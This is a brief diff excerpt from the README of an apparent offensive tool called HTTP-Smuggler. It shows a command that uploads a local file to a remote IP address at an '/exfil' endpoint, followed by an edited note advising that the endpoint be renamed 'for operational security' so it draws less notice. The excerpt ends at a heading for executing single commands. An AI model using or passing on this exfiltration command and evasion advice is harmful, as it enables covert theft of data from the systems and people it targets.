Mattb709/HTTP-Smuggler/README.md

 ```cmd
 client.exe -f newtest.txt -s http://142.134.220.83:80/exfil
 ```
-*The "exfil" endpoint is easily renamed to something more discreet.
+*Note:* The `/exfil` endpoint can be easily renamed for operational security

 **Execute a single command:**
 ```bash